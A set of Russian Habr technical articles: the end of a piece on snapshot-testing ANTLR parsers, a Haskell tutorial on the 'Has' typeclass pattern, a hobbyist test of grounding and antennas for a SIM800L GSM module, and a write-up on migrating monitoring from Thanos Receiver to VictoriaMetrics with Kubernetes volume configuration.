val parserOutput: ParserOutput = readFromFile[ParserOutput](testConfig(ParserSuiteDir, suite, fi.file))
val op = antlr4.parseFile(asVirtualFile(fi))
assertTrue(op.isInstanceOf[RLangOp], "Must be RLangOp")
assertEquals(parserOutput.languageName, op.asInstanceOf[RLangOp].language.name, "Languages are not equal")
assertOperations(op.key, op.children, parserOutput.items)
}
}
private def assertOperations(ownerKey: ROpKey, children: Seq[ROp], items: Seq[ParserOutputItem]): Unit = {
if (children.isEmpty) {
assertTrue(items == null || items.isEmpty, s"No items in operation: $ownerKey")
return
} else if (items == null) {
Assertions.fail(s"Missing child operations: $ownerKey")
}
val queue = new mutable.Queue[ParserOutputItem]()
queue ++= items
for (child <- children) {
assertTrue(queue.nonEmpty, s"Must not be empty at: ${child.key}")
val poi = queue.dequeue()
assertEquals(poi.keyText, child.key.toString, "Key text is not equal")
assertEquals(poi.specText, child.specText, "SpecText is not equal")
assertOperations(child.key, child.children, poi.children)
}
assertTrue(queue.isEmpty, s"Queue must be empty for: $ownerKey")
}
```
Теперь парсер будет гарантированно выдавать одно и тоже, проверка работы парсера может быть включена в CI/CD и гарантировать хотя бы формально, что парсер действительно работает в соответствии со спецификацией языка (разумеется если примеры подобраны корректные и разработчик не спал на работе). Имея на руках такую базу коротких примеров, в случае обнаружения ошибки, даже если половина файлов потребует изменений (что вряд ли), все равно не нужно будет смотреть все подряд - потому что все фичи во всех ЯП обладают иерархичностью из-за чего вы можете называть папки не просто по названию, но и добавив порядковый номер. При таком подходе может вовсе и не потребоваться смотреть все. Исправил первые две, а остальные 100 сами решились. Правильно выстраивая иерархию в ваших тестовых данных вы сможете сократить время на разработку и отладку на порядки.
Но самым важным преимуществом такого подхода к тестированию парсера является увеличение скорости разработки парсеров без потери качества, снижение трудозатрат, а ваши разработчики не будут превращаться в существ на обложке статьи, повторяющих одно и то же "тестируем". Зачем тратить недели рабочего времени, если то же самое можно сделать за пару секунд?
Для генерации тестовых дампов используется специальный класс org.lastrix.rscan.test.ParserTestSuiteGenerator, причем по сути система тестирования обладает двумя режимами. В первом режиме (основном), она верифицирует, что все работает как нужно, во втором, она помогает разработчику видеть наглядно, как его правки в грамматику влияют на изменение вывода (вы же не забыли, что все тестовые дампы у нас в репозиторий добавляются?), соответственно сделали правку, запустили генератор дампов и сразу увидели разницу, тем более что Intellij IDEA позволяет спокойно работать с тысячами измененных файлов - хуже, если файлы больше 4 кб. А имея на руках большую библиотеку вход-выход, можно и с внутренней документацией работу упростить, отчасти ее генерируя из тестовых данных. После парсера же еще этапы есть, не так ли?
Полный исходный код проекта для тестирования парсера языка Java, можно найти [тут](https://github.com/lastrix/rscan-parser-testing) . В пример включено небольшое множество тестовых данных (478 примеров), на моей машине (intel i7 9700k) обработка занимает всего 1s 45ms, при этом 65% строк кода парсера покрывается этими тестами.
Заключение
----------
В статье предложен подход к тестированию лексеров и парсеров, позволяющий ускорить разработку и отказаться от дедовского подхода, когда для проверки работы грамматики вам требовалось анализировать тысячи огромных проектов, что бы выцепить маленький баг. Писать руками огромное количество кода по проверке результата работы - все это можно автоматизировать, кроме пожалуй проверки результата генерации. Несмотря на то, что полностью отказаться от варианта тестирования тестирования большим кодом нельзя, можно сократить необходимость прибегать к такому подходу. Обнаруженный баг на большом коде можно легко воспроизвести на малом и в дальнейшем уже контролировать эту проблему. | https://habr.com/ru/post/533106/ | null | ru | null |
# Can I haz? Рассматриваем ФП-паттерн Has
Привет, Хабр.
Сегодня мы рассмотрим такой ФП-паттерн, как `Has`-класс. Это довольно любопытная штука по нескольким причинам: во-первых, мы лишний раз убедимся, что паттерны в ФП таки есть. Во-вторых, оказывается, что реализацию этого паттерна можно поручить машине, что вылилось в довольно любопытный трюк с тайпклассами (и библиотеку на Hackage), который лишний раз демонстрирует практическую полезность расширений системы типов вне Haskell 2010 и ИМХО куда интереснее самого этого паттерна. В-третьих, повод для котиков.

Однако начать, пожалуй, стоит всё же с описания того, что же такое `Has`-класс, тем более, что какого-то краткого (и, тем более, русскоязычного) описания сходу не нашлось.
Итак, как в хаскеле решается проблема управления некоторым глобальным окружением, доступным только для чтения, которое необходимо нескольким различным функциям? Как, например, выражается глобальная конфигурация приложения?
Самое очевидное и прямое решение — если функции нужно значение типа `Env`, то можно просто передавать значение типа `Env` в эту функцию!
```
iNeedEnv :: Env -> Foo
iNeedEnv env = -- опа, в env нужное нам окружение
```
Однако, к сожалению, такая функция не очень композабельна, особенно по сравнению с некоторыми другими объектами, к которым мы привыкли в хаскеле. Например, по сравнению с монадами.
Собственно, более обобщённое решение — обернуть функции, которым нужен доступ к окружению `Env`, в монаду `Reader Env`:
```
import Control.Monad.Reader
data Env = Env
{ someConfigVariable :: Int
, otherConfigVariable :: [String]
}
iNeedEnv :: Reader Env Foo
iNeedEnv = do
-- получаем всё окружение целиком:
env <- ask
-- или еcли нам нужен только кусочек:
theInt <- asks someConfigVariable
...
```
Это можно обобщить ещё сильнее, для чего достаточно воспользоваться тайпклассом `MonadReader` и всего лишь поменять тип функции:
```
iNeedEnv :: MonadReader Env m => m Foo
iNeedEnv = -- тут всё точно так же, как и раньше
```
Теперь нам совершенно неважно, в каком именно монадическом стеке мы находимся, покуда мы из него можем достать значение типа `Env` (и мы явно выражаем это в типе нашей функции). Нам неважно, обладает ли весь стек целиком какими-то другими возможностями вроде `IO` или обработки ошибок через `MonadError`:
```
someCaller :: (MonadIO m, MonadReader Env m, MonadError Err m) => m Bar
someCaller = do
theFoo <- iNeedEnv
...
```
И, к слову, чуть выше я на самом деле соврал, когда говорил, что подход с явной передачей аргумента в функцию не так композабелен, как монады: «частично применённый» функциональный тип `r ->` является монадой, и, более того, является вполне законным экземпляром класса `MonadReader r`. Развитие соответствующей интуиции предлагается читателю в качестве упражнения.
В любом случае, это хороший шаг к модульности. Давайте посмотрим, куда он нас заведёт.
Зачем Has
=========
Пусть мы работаем над каким-то веб-сервисом, у которого, среди прочего, могут быть следующие компоненты:
* слой доступа к БД,
* веб-сервер,
* активируемый по таймеру cron-подобный модуль.
Каждый из этих модулей может иметь свою собственную конфигурацию:
* реквизиты доступа к БД,
* хост и порт для веб-сервера,
* интервал работы таймера.
Можно сказать, что общая конфигурация всего приложения является объединением всех этих настроек (и, вероятно, чего-то ещё).
Предположим для простоты, что API каждого модуля состоит всего из одной функции:
* `setupDatabase`
* `startServer`
* `runCronJobs`
Каждая из этих функций требует соответствующей конфигурации. Мы уже узнали, что `MonadReader` — хорошая практика, но каким будет тип окружения?
Самым очевидным решением будет что-то вроде
```
data AppConfig = AppConfig
{ dbCredentials :: DbCredentials
, serverAddress :: (Host, Port)
, cronPeriodicity :: Ratio Int
}
setupDatabase :: MonadReader AppConfig m => m Db
startServer :: MonadReader AppConfig m => m Server
runCronJobs :: MonadReader AppConfig m => m ()
```
Скорее всего, эти функции будут требовать `MonadIO` и, возможно, что-то ещё, но это не столь важно для нашей дискуссии.
На самом деле мы сейчас сделали ужасную вещь. Почему? Ну, навскидку:
1. Мы добавили ненужную связь между совершенно различными компонентами. В идеале БД-слой вообще ничего не должен знать про какой-то там веб-сервер. И, конечно, мы не должны перекомпилировать модуль для работы с БД при изменениях списка конфигурационных опций веб-сервера.
2. Так вообще не получится сделать, если мы не можем редактировать исходный код части модулей. Например, что делать, если cron-модуль реализован в какой-то сторонней библиотеке, которая ничего не знает о нашем конкретном юзкейсе?
3. Мы добавили возможностей ошибиться. Например, что такое `serverAddress`? Это тот адрес, который должен слушать веб-сервер, или адрес сервера БД? Использование одного большого типа для всех опций увеличивает шанс подобных коллизий.
4. Мы больше не можем по одному взгляду на сигнатуры функций сделать вывод о том, какие модули пользуются какой частью конфигурации. Всё имеет доступ ко всему!
Так какое же решение для этого всего? Как можно догадаться по названию статьи, это
Паттерн `Has`
=============
На самом деле каждому модулю неважен тип всего окружения, покуда в этом типе есть нужные для модуля данные. Проще всего это показать на примере.
Рассмотрим модуль для работы с БД и предположим, что он определяет тип, содержащий всю нужную модулю конфигурацию:
```
data DbConfig = DbConfig
{ dbCredentials :: DbCredentials
, ...
}
```
`Has`-паттерн представляется в виде следующего тайпкласса:
```
class HasDbConfig rec where
getDbConfig :: rec -> DbConfig
```
Тогда тип `setupDatabase` будет выглядеть как
```
setupDatabase :: (MonadReader r m, HasDbConfig r) => m Db
```
и в теле функции мы лишь должны использовать `asks $ foo . getDbConfig` там, где мы раньше использовали `asks foo`, из-за дополнительного слоя абстракции, который мы только что добавили.
Аналогично у нас будут тайпклассы `HasWebServerConfig` и `HasCronConfig`.
Что, если какая-то функция использует два различных модуля? Просто совместим констрейнты!
```
doSmthWithDbAndCron :: (MonadReader r m, HasDbConfig r, HasCronConfig r) => ...
```
Что насчёт реализаций этих тайпклассов?
У нас всё ещё есть `AppConfig` на самом верхнем уровне нашего приложения (просто теперь модули о нём не знают), и для него мы можем написать:
```
data AppConfig = AppConfig
{ dbConfig :: DbConfig
, webServerConfig :: WebServerConfig
, cronConfig :: CronConfig
}
instance HasDbConfig AppConfig where
getDbConfig = dbConfig
instance HasWebServerConfig AppConfig where
getWebServerConfig = webServerCOnfig
instance HasCronConfig AppConfig where
getCronConfig = cronConfig
```
Пока что выглядит неплохо. Однако, у этого подхода есть одна проблема — *слишком много писанины*, и её мы подробнее рассмотрим в следующем посте. | https://habr.com/ru/post/470197/ | null | ru | null |
# Если связь — просто жесть, то ее нужно закопать

Любой советский школьник, собиравший подобную схему знал, что без заземления — никак.
Нынешнее поколение Z, взращенное айфонами, сомневается даже в необходимости антенн!
Эта статья показывает важность и необходимость двух данных элементов в условиях слабого сигнала.
У истинных связистов методика используемая далее вызовет весьма неоднозначные чувства(я предупредил), остальным можно и почитать.
Тема касается прежде всего проблемы GSM-связи, и разбирается на примере SIM800L, используемого многими в своих конструкциях.
На эксперименты меня подвигла необходимость "вытягивать" связь на передвижных пасеках, но суть от этого не меняется — истина — в "земле".
Как пользователь оценивает качество связи?
Обычно "ооо, у меня три деления".

У нас-же их будет целых тридцать!!!
GPRS-модуль SIM800L позволяет командой "AT+CSQ" оценить качество сигнала в "попугаях".
Я нашел таблицу их соответствия децибелам:
```
Value RSSI dBm Condition
2 -109 Marginal
3 -107 Marginal
4 -105 Marginal
5 -103 Marginal
6 -101 Marginal
7 -99 Marginal
8 -97 Marginal
9 -95 Marginal
10 -93 OK
11 -91 OK
12 -89 OK
13 -87 OK
14 -85 OK
15 -83 Good
16 -81 Good
17 -79 Good
18 -77 Good
19 -75 Good
20 -73 Excellent
21 -71 Excellent
22 -69 Excellent
23 -67 Excellent
24 -65 Excellent
25 -63 Excellent
26 -61 Excellent
27 -59 Excellent
28 -57 Excellent
29 -55 Excellent
30 -53 Excellent
```
Для тестирования я расположился на даче, возле точки ввода шины заземления в грунт:

Дабы антенна не смещалась, приклеил ее к куску деревянного бруса.
Итак, включаем модем, дожидаемся загрузки, и с десяток раз повторяем команду AT+CSQ.
Без заземления — 10 попугаев, -93 dBm, OK.
Подключаем к хорошему заземлению, перегружаем модем, повторяем команду — 15 попугаев, -83 dBm, Good.
И это действительно ГУД, ибо мы получили-бы те самые три "палки" на мобильном.
Но если пасека передвижная то вряд-ли кто-то станет на каждом новом месте организовывать контур заземления или вбивать длинную трубу до грунтовых вод.
Да что там пасека, к примеру вы выбрались на выходные на природу, а интернета-нет — для поколения Z — это катастрофа, а не пикник!
Я, к примеру, с помощью лома и такой-то матери еле вытащил 1.5м уголок-пятидесятку, вбитый в достаточно мягкий грунт — торф+песок.
Старые книги и журнал радио за 1957 год рекомендуют вкопать оцинкованное(не-ржавое) ведро или лист металла 50x100см глубже метра.
И еще полить это дело ведром воды с разведенным стаканом поваренной соли.
Кто станет таким заниматься, скажем, в масштабах пикника???
Недолго думая, с помощью сварки из 6.5мм катанки сделал метровые Т-шки, припаял 1.5мм медь и заострил:

Заодно по фото можно оценить мой грунт во дворе.
Что есть силы руками загоняю в землю первый прут — на 80см. — проверяю сигнал (после перезагрузки) — ничего.
Отступаю от него метр — та-же процедура со вторым — и снова сигнал неизменен.
Делаю равносторонний треугольник, загнав в землю третий штырь (грунт слегка влажный) — ничего!
Ок, беру в руки молоток и загоняю штыри по самую поперечину — BINGO!
Целых 13 попугаев! -87 dBm, OK
Конечно, не 15 но уже что-то!
Вы думаете на этом наша история закончилась? Нееет!
Посмотрим теперь на антенну:

Памятуя, что коэффициент усиления антенны измеряется относительно симметричного полуволнового вибратора, я отказывался верить в целых 2! ЖДВА КАРЛ! DBI.
И правильно делал.
Убрав сие китайское чудо, припаял 80мм моножилы диаметром ~1.7мм:

Грубо, сурово, но модуль чутко отреагировал на подобное "кощунство", наградив кусок провода целым попугаем!
Четырнадцать! и это при самопальной земле! -85dbm OK
Разница с 3-см "изделием" из поднебесной — целых 3dBm!
Хочется воскликнуть — "Уважаемые китайцы! Относительно чего Вы меряете???"
Далее, я переключился на нормальное заземление, и… отломал медную антенну ;-)
Ладно, включаем китайское чудо, повторяем замер — те-же 15 попугаев, что и в начале теста.
Но взяв стремянку и поднявшись на 2 метра выше уровня столика, получилось уже 16 попугаев, -81dBm или Good.
Но что юнцам безусым децибелы?
Переведу в цифры — у меня на 4-м. штанге установлена антенна GSM-900 (логопериодическая), подключенная к CDMA-модему (EVDO rev.A) — отключаю "землю" — 700КБит/с, вбиваю метровую арматурину диаметром 10мм в ямку — та-же картина, заливаю водой — ~1.5 Мегабита, подключаю к нормальной земле — 2 и выше.
Дальше сын позвал меня кататься на велосипедах, и эксперимент на этом закончился.
ДА, штыри из земли выходили очень туго, поперечины за которые тянул выгнулись дугами.
Что-же можно сказать по результатам?
Оказавшись на пикнике без интернета, у Вас есть два выхода:
1. Залезть повыше на дерево.
2. Воткнуть в землю три шампура, полить водой(соленой, а откуда ее взять — догадайтесь сами — это пиво на выходе из организма ;-)
При этом конечно нужно будет пожертвовать шнуром от плойки Вашей подруги — да-да, они даже на природу берут такие вещи — на всякий случай.
А можно просто наслаждаться природой и компанией друзей!
Хороших Вам майских праздников и берегите природу!
Электропчеловод Андрей. | https://habr.com/ru/post/448998/ | null | ru | null |
# Как мы пытались подружить VictoriaMetrics и Thanos (и у нас почти получилось)
Источник изображения — СоюзМультфильм ©Привет! Меня зовут Григорий, я техлид в Cloud Infrastructure Team в Сравни. Моя команда отвечает за observability системы и облачную инфраструктуру. Не так давно мы полностью обновили наш стек мониторинга. Хочу рассказать, как у нас организовано хранение long-term метрик без использования Object Storage.
Мы в Сравни долгое время использовали связку Prometheus + Thanos для мониторинга и хранения данных. Для Thanos мы использовали схему с [sidecar’ом](https://camo.githubusercontent.com/4720f0b558ad470b8b73a6e459bac133bef772c92f96e4f327ae303e21254fbd/68747470733a2f2f646f63732e676f6f676c652e636f6d2f64726177696e67732f642f652f32504143582d31765442464b4b6766385944496e4a7952616b504538655a5a67397068546c4f734242326f674e6b4676684e47625a385944767a5f63474d6278575a42473147366870735166535831343546705963762f7075623f773d39363026683d373230). Эта схема работала довольно неплохо, но с ростом проекта — росло и потребление ресурсов. Со временем задачи по scrape samples уже потребляли значительные ресурсы. Когда только на Prometheus стало уходить больше 30 ядер vCPU и 100 гигабайт RAM, мы начали искать способы оптимизации потребления ресурсов.
Первым делом определили требования, которые необходимы для системы мониторинга:
* должно поддерживаться развертывание в Kubernetes;
* система должна быть способна переезжать из одного Kubernetes-кластера в другой без потери данных;
* нужна поддержка downsampling;
* возможность построить high availability систему;
* в идеале, чтобы система требовала очень мало внимания на обслуживание ;)
Мы поизучали варианты, и сперва показалось, что будет хорошей идеей взять стек VMAgent + [Thanos receiver](https://camo.githubusercontent.com/b0a661d7478b5f65500f704419796ff3ccb3c4aa5ea791c3db2cd2d587831867/68747470733a2f2f646f63732e676f6f676c652e636f6d2f64726177696e67732f642f652f32504143582d317654666b6f323759425f336162375a4c384f444e47357543637270714b78686d71617a336c572d7968474e335f6f4e786b547271586d77776c635a6a61576633634767414a494d34434d77776b45562f7075623f773d39363026683d373230). Как несложно угадать из названия статьи, этого у нас не получилось. Недавно я увидел в одном профессиональном чате, что коллеги захотели использовать такой же стек и по тем же причинам, что и мы. Поэтому решил поделиться нашим опытом и рассказать, к чему мы в итоге пришли.
### Причины выбора VMAgent + Thanos receiver
Начнем с агента, осуществляющего сбор samples. В Prometheus для каждого remote write создается in-memory очередь, в которую записываются samples из журнала (WAL). Данные в очереди хранятся [в течение двух часов](https://prometheus.io/docs/practices/remote_write/#remote-write-characteristics), и это поведение не изменить. Но есть [issue](https://github.com/prometheus/prometheus/issues/9607) на изменение такого поведения.
> *Забегая вперед, при выборе данного стека, каким-то образом мы упустили один*[*, казалось бы, очевидный момент*](https://github.com/thanos-io/thanos/blob/main/docs/components/receive.md#:~:text=The%20thanos%20receive,hours%20by%20default.) *в схеме с Thanos Receiver*. *То есть по факту мы бы просто перешли бы из pull на push модель (о плюсах и минусах можно посмотреть* [*здесь*](https://docs.google.com/document/d/1H47v7WfyKkSLMrR8_iku6u9VB73WrVzBHb2SB6dL9_g/edit#heading=h.2v27snv0lsur)*), получили возможность поддержки мультитенантности с global view, а также исключили ситуацию, когда sidecar может перестать заливать time series в* [*object storage*](https://habr.com/ru/post/482272/#:~:text=%D0%A3%20Thanos%20%D0%BD%D1%83%D0%B6%D0%BD%D0%BE%20%D1%81%D0%BB%D0%B5%D0%B4%D0%B8%D1%82%D1%8C,%D0%BF%D0%BE%D0%BF%D0%B0%D0%BB%D0%B8%20%D0%B2%20Object%20Storage.)*. И вряд ли бы получили бы экономию в ресурсах (как записывали изначально в своих целях).*
>
> *Когда поняли это, мы приняли решение всё же продолжить тестирование данной схемы, но уже параллельно продумывая другое решение.*
>
>
VMAgent умеет кешировать samples на диск в случае проблем в сети или с удаленным стораджем, и потом отправлять их, как только связь с удаленным стораджем восстановится — это очень удобно. Размер буфера ограничивается размером диска. Также есть опция -memory.allowedPercent – позволяет регулировать допустимый процент системной памяти, которую могут занимать кэши метрик (по умолчанию 60% от доступной памяти). И да, VictoriaMetrics умеет в автоматическое определение лимитов памяти и процессора под управлением cgroupv2.
Протестировав Prometheus и VMAgent на одинаковых количествах samples, мы увидели, что VMAgent потребляет меньше ресурсов, чем Prometheus (к сожалению, результаты тестов не дожили до написания данной статьи).
В связи с вышесказанным, для наших задач VMAgent подходил больше, поэтому мы остановились на нем, как на агенте, осуществляющем сбор samples и сохраняющем их в удаленный сторадж.
Thanos же выбрали по следующим причинам:
* Community edition версия поддерживает downsampling (VMStorage поддерживает только в Enterprise-версии);
* есть поддержка работы с Object Storage (изначально нам казалось, что это единственный способ не терять данные без downtime при переезде стораджа между кластерами).
### Начало тестирования
Начали мы, конечно же, с поиска [issue](https://github.com/VictoriaMetrics/VictoriaMetrics/issues/873) и чтения документации. Вооружившись этими ~~сакральными~~ знаниями и с помощью helm chart’ов, все необходимые компоненты развернули в Kubernetes, и схема довольно быстро заработала (подозрительно!).
[Схема работы c Thanos Receiver](https://camo.githubusercontent.com/b0a661d7478b5f65500f704419796ff3ccb3c4aa5ea791c3db2cd2d587831867/68747470733a2f2f646f63732e676f6f676c652e636f6d2f64726177696e67732f642f652f32504143582d317654666b6f323759425f336162375a4c384f444e47357543637270714b78686d71617a336c572d7968474e335f6f4e786b547271586d77776c635a6a61576633634767414a494d34434d77776b45562f7075623f773d39363026683d373230) мало чем отличается от Thanos с sidecar. Если вам интересно более подробно разобраться в компонентах Thanos и VictoriaMetrics, рекомендую прочитать две статьи Александра Валялкина — на [хабре](https://habr.com/ru/post/482272/), и на [medium](https://faun.pub/comparing-thanos-to-victoriametrics-cluster-b193bea1683). Я кратко пройдусь по компонентам, останавливаясь на тех частях, которых нет в статьях Александра.
VMAgent собирает samples из таргетов по pull-модели. После этого VMAgent отправляет samples в Thanos Receiver (на самом деле, отправляет на L7 балансировщик нагрузки, а тот – уже по round robin на Thanos Receiver). Thanos Receiver может состоять из одной или нескольких реплик (далее буду называть их эндпоинтами). Для балансировки нагрузки, репликации данных и service discovery используется файл hashring configuration. Выглядит он [так](https://thanos.io/v0.11/201812_thanos-remote-receive.md/#:~:text=%5B%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%22hashring,%5D%0A%20%20%20%20%7D%0A%5D) – внутри перечислены эндпоинты, tenant ID и порты.
Thanos Receiver бывает soft tenancy и hard tenancy.
* Soft tenancy – запросы, tenant ID которых явно не совпадает ни с одним другим эндпоинтом в конфигурационном файле, автоматически попадают в это хэш-кольцо soft tenancy; то есть по факту это тенант по умолчанию, если не найдется нужный эндпоинт. К слову, id данного тенанта задается через переменную receive.default-tenant-id. А еще данный тенант может выступать как балансировщик (в документации значится как Load distribution) к hard tenancy.
* Hard tenancy – если просто, это те эндпоинты, у которых установлен tenant ID в каждом HTTP-запросе. Данный механизм нужен для мультитенантной архитектуры Thanos. В нашем случае не было таких задач, и мы везде использовали Soft tenancy Thanos Receiver.
На тестовым стенде Thanos Receiver состоял из четырех реплик (по две реплики в каждой из зон доступности) и хранил данные в течении трёх дней (-tsdbRetention=3d). Почему решили хранить данные на Thanos Receiver три дня? Наш анализ показал, что чаще всего используются метрики в течении трех дней (скажем так, горячие метрики) и чтобы ускорить их выдачу пользователям, было принято решение оставить метрики до трех дней на SSD-дисках.
Thanos Receiver, получив samples от VMAgent, отправляет данные time series на другие эндпоинты, которые указаны в hashring configuration файле. Если какой-либо time seriesв запросе на запись на эндпоинт Thanos Receiver не был успешно записан по крайней мере на [(ReplicationFactor / 2) + 1](https://github.com/thanos-io/thanos/blob/7ba274c69cb0a848c7e8e1c593221faa80d8b6e6/pkg/receive/handler.go#L438), то Thanos Receiver отвечает ошибкой к VMAgent. Например, при replication-factor=3 Thanos Receiver убедится, что каждый time series успешно записан по крайней мере на двух Thanos receivers в эндпоинтах hashring файла [( 3/2 + 1 = 2,5 = 2)](https://play.golang.com/p/xGIukhSwIHi).
Еще одно отличие от схемы с sidecar – в том, что Thanos Query делает запросы вместо sidecar в receiver (помимо Store Gateway), и агенту (Prometheus или VMAgent) необходимо отправить данные в Thanos Receiver (в схеме с sidecar, сам Thanos Sidecar сохранял данные в Object Storage).
### Но есть нюанс…
В целом, вышеописанная схема сработала для нас. Но дьявол кроется в мелочах, и для нас они стали критичными.
#### Нюансы номер раз и два
Проблемы начались при удалении пода одного из эндпоинтов Thanos Receiver — тестировали случаи, когда под с Thanos Receiver находился на ноде, в которой произошел сбой. Например, инженер ошибся и удалил ноду из кластера, сработал дешедуллер, и нода удалилась, или по каким-то причинам нода с подом Thanos Receiver упала.
Мы стали периодически получать 409 ошибки в VMAgent, а в логах Thanos Receiver увидели: hashring has changed; server is not ready to receive web requests.
Затем мы решили проверить случай отказа кластера или большей его части – отключили три ноды, на которых были поды с Thanos Receiver и логи перестали писаться. Тут все логично.
Вернули все три ноды в работу, но логи не появились в VMAgent, и были видны 409 ошибки. В логах: Error on ingesting samples that are too old or are too far into the future. В [документации есть описание](https://thanos.io/tip/operating/troubleshooting.md/#thanos-receiver-log) данной проблемы и ее причины, но нет решения.
Обе проблемы помог решить [thanos-receive-controller](https://github.com/observatorium/thanos-receive-controller), который отслеживает количество running подов с лейблом controller.receive.thanos.io=thanos-receive-controller (можно поставить и свой, разумеется) и обновляет configMap c hashring configuration файлом, и с задержкой (по нашим тестам, примерно через 120 секунд) обновляется в контейнере. После этого Thanos Receiver перечитывает конфиг. Важно — не монтировать configMap как subPath, иначе не обновится файл в контейнере; подробнее о нюансах configMap можно почитать в блоге [Фланта](https://habr.com/ru/company/flant/blog/498970/).
Учтите, что у данного подхода с контроллером есть и [минусы](https://github.com/observatorium/thanos-receive-controller/issues/69).
#### Нюанс номер три
Отключили все ноды с подами Thanos Receiver больше, чем на 2 часа; помним, что Thanos Receiver – это реализация над Prometheus Remote Write API, со всеми вытекающими. Получили проблему с тем, что Thanos Receiver отбрасывает логи.
[У этой проблемы пока что нет решения](https://github.com/thanos-io/thanos/issues/2114); это нужно учитывать при эксплуатации.
#### Нюанс номер четыре
Решили добавить реплик VMAgent (~~мы же все за высокую доступность всех компонентов, да ведь?)~~.
Но для дедупликации Thanos Querier [использует query.replica-label](https://thanos.io/v0.18/components/query.md/#deduplication). И есть требование, чтобы для каждого агента должен [отличаться extrnal\_labels](https://thanos.io/tip/thanos/quick-tutorial.md/#external-labels). Значит, на каждой реплике VMAgent он должен отличаться.
Решение нашлось довольно быстро: в конфиге VMAgent проставляем переменную окружения POD\_NAME:
```
external_labels:
replica: %{POD_NAME}
```
И в statefulSet VMagent пробросить имя пода в переменную окружения:
```
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
```
Все заработало.
#### Нюанс номер пять
Для двух реплик VMAgent и сбоев в сети была ещё одна проблема – уезжали метрики. Иногда на час, иногда на два часа — с дельтой во времени.
Мы так и не смогли понять причину этого явления. Но при использовании одной реплики VMAgent такой проблемы не наблюдалось.
Если вы знаете возможную причину такого поведения, буду рад прочитать об этом в комментариях).
#### Суммируем нюансы
На основании результатов тестирования мы приняли решение не тащить связку VMAgent + Thanos receiver в прод.
Вышеописанные нюансы в Thanos проявляются из-за того, что данный вид стораджа не поддерживает backfilling – вставку данных, соответствующих временной метке в прошлом. Тут есть некоторые вещи, которые можно сделать, начиная с версии [Prometheus v2.24.0](https://github.com/prometheus/prometheus/blob/v2.24.0/docs/storage.md#backfilling-from-openmetrics-format). Если интересны объяснения на примерах, как это работает, можно посмотреть [тут](https://www.projectpro.io/recipes/deal-with-missing-values-in-timeseries-in-python) и [тут](https://docs.timescale.com/timescaledb/latest/how-to-guides/compression/backfill-historical-data/#backfill-historical-data-on-compressed-chunks).
### А что с VictoriaMetrics stack?
Как я говорил выше, параллельно с тестированием Thanos Receiver, мы начали изучать другие варианты и решили сконцентрироваться на VictoriaMetrics.
Одной из фич VictoriaMetrics является поддержка Backfilling из [коробки](https://docs.victoriametrics.com/?highlight=backfilling#:~:text=It%20supports%20metrics%27%20scraping%2C%20ingestion%20and%20backfilling%20via%20the%20following%20protocols). Поэтому проблемы с out-of-order samples при использовании стека VictoriaMetrics нам не страшны. Это же позволяет использовать параллельные очереди для каждого remote write стораджа, если одной очереди недостаточно для отправки большого объема собранных данных в удаленное хранилище. При этом в Thanos мы всегда должны использовать только одну очередь, иначе получим [out-of-order samples](https://thanos.io/tip/operating/troubleshooting.md/#out-of-order-samples-error).
За время тестирования мы выяснили, что VictoriaMetrics больше подходит под наши задачи. Поэтому нам осталось только решить, как перенести данные из одного кластера k8s в другой.
Первый и очевидный вариант — использовать vmbackup. Но это подразумевает временный простой, когда будут переноситься данные из одного кластера в другой. А нам нужна была возможность переноса VMStorage между кластерами по очереди и с последующим переключением stateless-сущностей (vmagent, vmselect, vminsert).
Мы используем managed kubernetes в облаках, поэтому нам нужно было, чтобы решение поддерживалось обоими нашими облачными провайдерами (у нас это Яндекс.Облако и Azure). Изучив документацию наших облачных провайдеров, обнаружили, что оба вендора поддерживают возможность добавления static PersistentVolume (подробнее – для Azure [тут](https://docs.microsoft.com/en-us/azure/databox-online/azure-stack-edge-gpu-deploy-stateful-application-static-provision-kubernetes), для ЯО [тут](https://cloud.yandex.ru/docs/managed-kubernetes/operations/volumes/static-create-pv)). В итоге мы пришли к следующей архитектуре:
* через terraform создаем диски в облаке;
* создаем объект PersistentVolume в Kubernetes под каждый созданный диск.
Так как StatefulSet при создании пода имеет уникальный упорядоченный идентификатор, то при использовании volumeClaimTemplates мы можем описать, какое имя нашего тома будет использоваться с указанием claimName (оно тоже упорядоченное, и будет использоваться тот же идентификатор что в поде), и таким образом, не будет запускаться провижинер для создания новых томов PersistentVolume.
В этой схеме правильное наименование claimRef очень важно. Ниже — немного упрощенный конфиг, для понимания. В примере созданы две PersistentVolume с отличающимися claimRef и volumeHandle (индентификатор нашего диска) и один kind StatefulSet c volumeClaimTemplates.
```
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: prod-yc-vm-storage-0
spec:
capacity:
storage: 100Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Retain
storageClassName: yc-network-ssd
csi:
driver: disk-csi-driver.mks.ycloud.io
fsType: ext4
# See it in terraform.
volumeHandle: qwerty0
claimRef:
namespace: monitoring-system
name: pvc-vm-vmstorage-0
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: prod-yc-vm-storage-1
spec:
capacity:
storage: 100Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Retain
storageClassName: yc-network-ssd
csi:
driver: disk-csi-driver.mks.ycloud.io
fsType: ext4
# See it in terraform.
volumeHandle: qwerty1
claimRef:
namespace: monitoring-system
name: pvc-vm-vmstorage-1
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: vmstorage
namespace: monitoring-system
spec:
selector:
matchLabels:
app: vmstorage
serviceName: "vmstorage"
replicas: 2
podManagementPolicy: OrderedReady
template:
metadata:
labels:
app: vmstorage
app.kubernetes.io/name: vmstorage
app.kubernetes.io/instance: vmstorage-b
app.kubernetes.io/version: "v1.74.0"
spec:
containers:
- name: vmstorage
image: "victoriametrics/vmstorage:v1.74.0-cluster"
volumeMounts:
- name: pvc-vm
mountPath: /storage
volumeClaimTemplates:
- metadata:
name: pvc-vm
spec:
accessModes: [ "ReadWriteOnce" ]
resources:
requests:
storage: 100Gi
storageClassName: yc-network-ssd
```
Теперь мы можем переносить VMStorage из одного кластера Kubernetes в другой, поочередно уменьшая реплики StatefulSet в одном кластере с удалением PersistentVolume и добавляя PersistentVolume с увеличением реплик в другом, сопровождая это изменением конфигурации в VMSelect и VMInsert.
В этой схеме есть два нюанса:
* Автоматизацию этого переключения мы пока не сделали, отложив эту задачу в бэклог — до времени, когда такая ситуация понадобится. Данное решение — скорее задел на будущее.
